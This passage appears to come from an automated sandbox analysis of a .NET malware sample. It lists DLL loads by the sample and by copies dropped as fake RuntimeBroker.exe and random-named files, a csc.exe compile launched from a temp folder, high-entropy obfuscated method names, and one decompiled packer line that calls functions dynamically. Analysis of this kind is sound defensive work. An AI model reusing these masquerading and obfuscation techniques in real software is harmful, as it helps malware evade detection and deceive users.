                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeSection loaded: wldp.dll
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeSection loaded: profapi.dll
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeSection loaded: cryptsp.dll
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeSection loaded: rsaenh.dll
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeSection loaded: cryptbase.dll
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeSection loaded: sspicli.dll
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeSection loaded: ktmw32.dll
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeSection loaded: rasapi32.dll
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeSection loaded: rasman.dll
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeSection loaded: rtutils.dll
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeSection loaded: mswsock.dll
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeSection loaded: winhttp.dll
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeSection loaded: iphlpapi.dll
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeSection loaded: dhcpcsvc6.dll
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeSection loaded: dhcpcsvc.dll
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeSection loaded: dnsapi.dll
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeSection loaded: winnsi.dll
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeSection loaded: rasadhlp.dll
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeSection loaded: fwpuclnt.dll
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeSection loaded: wbemcomn.dll
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeSection loaded: edputil.dll
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeSection loaded: winmm.dll
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeSection loaded: winmmbase.dll
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeSection loaded: dwrite.dll
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeSection loaded: mmdevapi.dll
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeSection loaded: devobj.dll
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeSection loaded: ksuser.dll
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeSection loaded: avrt.dll
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeSection loaded: audioses.dll
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeSection loaded: powrprof.dll
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeSection loaded: umpdc.dll
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeSection loaded: msacm32.dll
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeSection loaded: midimap.dll
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeSection loaded: windowscodecs.dll
                            Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exeSection loaded: mscoree.dll
                            Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exeSection loaded: apphelp.dll
                            Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exeSection loaded: kernel.appcore.dll
                            Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exeSection loaded: version.dll
                            Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exeSection loaded: uxtheme.dll
                            Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exeSection loaded: windows.storage.dll
                            Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exeSection loaded: wldp.dll
                            Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exeSection loaded: profapi.dll
                            Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exeSection loaded: cryptsp.dll
                            Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exeSection loaded: rsaenh.dll
                            Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exeSection loaded: cryptbase.dll
                            Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: esent.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: mi.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: webio.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: es.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dll
                            Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exeSection loaded: mscoree.dll
                            Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exeSection loaded: kernel.appcore.dll
                            Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exeSection loaded: version.dll
                            Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exeSection loaded: uxtheme.dll
                            Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exeSection loaded: windows.storage.dll
                            Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exeSection loaded: wldp.dll
                            Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exeSection loaded: profapi.dll
                            Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exeSection loaded: cryptsp.dll
                            Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exeSection loaded: rsaenh.dll
                            Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exeSection loaded: cryptbase.dll
                            Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exeSection loaded: sspicli.dll
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeSection loaded: mscoree.dll
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeSection loaded: version.dll
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeSection loaded: uxtheme.dll
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeSection loaded: windows.storage.dll
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeSection loaded: wldp.dll
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeSection loaded: profapi.dll
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeSection loaded: cryptsp.dll
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeSection loaded: rsaenh.dll
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeSection loaded: cryptbase.dll
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeSection loaded: sspicli.dll
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeSection loaded: mscoree.dll
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeSection loaded: kernel.appcore.dll
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeSection loaded: version.dll
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeSection loaded: uxtheme.dll
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeSection loaded: windows.storage.dll
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeSection loaded: wldp.dll
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeSection loaded: profapi.dll
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeSection loaded: cryptsp.dll
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeSection loaded: rsaenh.dll
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeSection loaded: cryptbase.dll
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeSection loaded: sspicli.dll
                            Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exeSection loaded: mscoree.dll
                            Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exeSection loaded: kernel.appcore.dll
                            Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exeSection loaded: version.dll
                            Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exeSection loaded: uxtheme.dll
                            Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exeSection loaded: windows.storage.dll
                            Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exeSection loaded: wldp.dll
                            Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exeSection loaded: profapi.dll
                            Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exeSection loaded: cryptsp.dll
                            Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exeSection loaded: rsaenh.dll
                            Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exeSection loaded: cryptbase.dll
                            Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exeSection loaded: sspicli.dll
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeSection loaded: mscoree.dll
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeSection loaded: version.dll
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeSection loaded: uxtheme.dll
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeSection loaded: windows.storage.dll
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeSection loaded: wldp.dll
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeSection loaded: profapi.dll
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeSection loaded: cryptsp.dll
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeSection loaded: rsaenh.dll
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeSection loaded: cryptbase.dll
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeSection loaded: sspicli.dll
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeSection loaded: mscoree.dll
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeSection loaded: kernel.appcore.dll
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeSection loaded: version.dll
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                            Source: Window RecorderWindow detected: More than 3 window changes detected
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                            Source: EQdhBjQw4G.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                            Source: EQdhBjQw4G.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                            Source: EQdhBjQw4G.exeStatic file information: File size 1719296 > 1048576
                            Source: EQdhBjQw4G.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x1a3400
                            Source: EQdhBjQw4G.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                            Source: Binary string: 7C:\Users\user\AppData\Local\Temp\5czz1opi\5czz1opi.pdb source: EQdhBjQw4G.exe, 00000000.00000002.1680880366.0000000003B7D000.00000004.00000800.00020000.00000000.sdmp

                            Data Obfuscation

                            barindex
                            .NET source code contains method to dynamically call methods (often used by packers)
                            Source: EQdhBjQw4G.exe, hpJE61kMAL8Awig2KFg.cs.Net Code: Type.GetTypeFromHandle(o85UtLpraMtZAmto0dI.ae9WhwfC7SI(16777424)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(o85UtLpraMtZAmto0dI.ae9WhwfC7SI(16777245)),Type.GetTypeFromHandle(o85UtLpraMtZAmto0dI.ae9WhwfC7SI(16777259))})
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5czz1opi\5czz1opi.cmdline"
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5czz1opi\5czz1opi.cmdline"Jump to behavior
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeCode function: 0_2_00007FFD9B8953BF push ebx; ret 0_2_00007FFD9B8953C2
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeCode function: 0_2_00007FFD9B8936E6 push es; iretd 0_2_00007FFD9B8936E7
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeCode function: 0_2_00007FFD9B8936DC push es; iretd 0_2_00007FFD9B8936DF
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeCode function: 0_2_00007FFD9B9F5223 push edi; ret 0_2_00007FFD9B9F5226
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeCode function: 0_2_00007FFD9B9F27B9 push ecx; ret 0_2_00007FFD9B9F27BA
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeCode function: 0_2_00007FFD9B9F4EE5 push esi; ret 0_2_00007FFD9B9F4EE7
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeCode function: 0_2_00007FFD9B9F2745 push ecx; ret 0_2_00007FFD9B9F2746
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeCode function: 0_2_00007FFD9BC3F049 push edi; retf 0_2_00007FFD9BC3F029
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeCode function: 0_2_00007FFD9BC3840F push eax; retf 0_2_00007FFD9BC38410
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeCode function: 0_2_00007FFD9BC3BFD8 push eax; retf 0_2_00007FFD9BC3C092
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeCode function: 0_2_00007FFD9BC38357 push eax; retf 0_2_00007FFD9BC38358
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeCode function: 0_2_00007FFD9BC375D1 push eax; iretd 0_2_00007FFD9BC375D5
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeCode function: 0_2_00007FFD9BC3C12F push esi; retf 0_2_00007FFD9BC3C132
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeCode function: 0_2_00007FFD9BC3694D push ds; retf 0_2_00007FFD9BC36962
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeCode function: 0_2_00007FFD9BC3C15C push ebp; retf 0_2_00007FFD9BC3C10A
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeCode function: 0_2_00007FFD9BC3C0F0 push ebp; retf 0_2_00007FFD9BC3C10A
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeCode function: 0_2_00007FFD9BC3C0F3 push ebp; retf 0_2_00007FFD9BC3C10A
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeCode function: 0_2_00007FFD9BC3ECE9 push esp; retf 0_2_00007FFD9BC3ECC9
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeCode function: 0_2_00007FFD9BC34510 push es; retf 0_2_00007FFD9BC3451A
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeCode function: 0_2_00007FFD9BC3C0A0 push edx; retf 0_2_00007FFD9BC3C0BA
                            Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exeCode function: 22_2_00007FFD9B8953BF push ebx; ret 22_2_00007FFD9B8953C2
                            Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exeCode function: 22_2_00007FFD9B8936E6 push es; iretd 22_2_00007FFD9B8936E7
                            Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exeCode function: 22_2_00007FFD9B8936DC push es; iretd 22_2_00007FFD9B8936DF
                            Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exeCode function: 22_2_00007FFD9B8A960A push eax; ret 22_2_00007FFD9B8A960F
                            Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exeCode function: 22_2_00007FFD9B8A964B push cs; ret 22_2_00007FFD9B8A9651
                            Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exeCode function: 22_2_00007FFD9B8A6DC7 push ebp; iretd 22_2_00007FFD9B8A6DC8
                            Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exeCode function: 22_2_00007FFD9B8CBEB3 push 00000071h; iretd 22_2_00007FFD9B8CBEC0
                            Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exeCode function: 22_2_00007FFD9B8C792B push ebx; retf 22_2_00007FFD9B8C796A
                            Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exeCode function: 22_2_00007FFD9B8C7072 push edx; iretd 22_2_00007FFD9B8C7073
                            Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exeCode function: 22_2_00007FFD9B8C706A push edx; iretd 22_2_00007FFD9B8C706B
                            Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exeCode function: 25_2_00007FFD9B8CBEB3 push 00000071h; iretd 25_2_00007FFD9B8CBEC0
                            Source: EQdhBjQw4G.exeStatic PE information: section name: .text entropy: 7.4610435048156285
                            Source: RuntimeBroker.exe.0.drStatic PE information: section name: .text entropy: 7.4610435048156285
                            Source: ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe.0.drStatic PE information: section name: .text entropy: 7.4610435048156285
                            Source: ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe0.0.drStatic PE information: section name: .text entropy: 7.4610435048156285
                            Source: ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe1.0.drStatic PE information: section name: .text entropy: 7.4610435048156285
                            Source: EQdhBjQw4G.exe, k504KWGctpYSQhovm00.csHigh entropy of concatenated method names: 'BWkG2nEDmR', 'r6rF3cBjs2FLolh7UEpU', 'sLkBcSBjw9sbEfc8rDbk', 'dcrT2DBjyCslCxWD8NdA', 'ryCsqjBjmT3OfLseeKlo', 'VFnrvKBjagArvs97vMUv', 'E94', 'P9X', 'vmethod_0', 'cpZBbIfoW3k'
                            Source: EQdhBjQw4G.exe, WQwxvDu2qTsVtZSHISD.csHigh entropy of concatenated method names: 'DB4', 'method_0', 'method_1', 'method_2', 'method_3', 'method_4', 'method_5', 'A47', 'fC4', 'aK3'
                            Source: EQdhBjQw4G.exe, ERocErSBIqy2VSvoxMR.csHigh entropy of concatenated method names: 'rC9', 'method_0', 'WBTBefATJMp', 'jN6BeIH8Oss', 'OQSUrDB5mduvL2b8d6MC', 'vH6Yy2B5aIdLQ839CJAq', 'Y1DfjqB5XkPd2Z9EGJfK', 'Mmy1sYB5PW432XoQoDeI', 'EeCEOHB5xocaQJxBbxxS', 'sWExUXB5ZaHWl6pubqs1'
                            Source: EQdhBjQw4G.exe, ySsgcw84l2KLs7TRiVs.csHigh entropy of concatenated method names: 'Ceq88WTotK', 'KJL8K04SAm', 'AwD8tXMdrI', 'hv48gIJE2h', 'GSC8uPqQFu', 'X8cnNdBsplgUhtc3DfxI', 'Scb8p7BsCgIf2bjqJ6nN', 'bHcw3fBszF3dIGKfyqRS', 'GIMdATBmFDxpCfx3cg5Y', 'zFgWwZBmBXStx0Ij5CRv'
